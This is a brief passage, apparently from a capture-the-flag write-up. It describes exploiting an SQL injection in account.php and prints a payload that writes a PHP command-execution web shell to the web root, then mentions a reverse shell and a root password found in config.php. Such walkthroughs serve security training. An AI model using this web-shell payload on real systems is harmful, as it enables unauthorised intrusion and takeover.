The config.php endpoint presented an empty screen, which I think we have to look into after gaining a shell. Anyways, the account.php file displayed an SQL error when trying to view the player I registered.
Instead of enumerating the database, I directly wrote a webshell into the page.
username=a&Afganistan' UNION SELECT "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/cmd.php';#
Then, we can get a reverse shell and enumerate the config.php file we saw earlier.
Privilege Escalation
Within the config file, there was a password, which happened to be the root password.
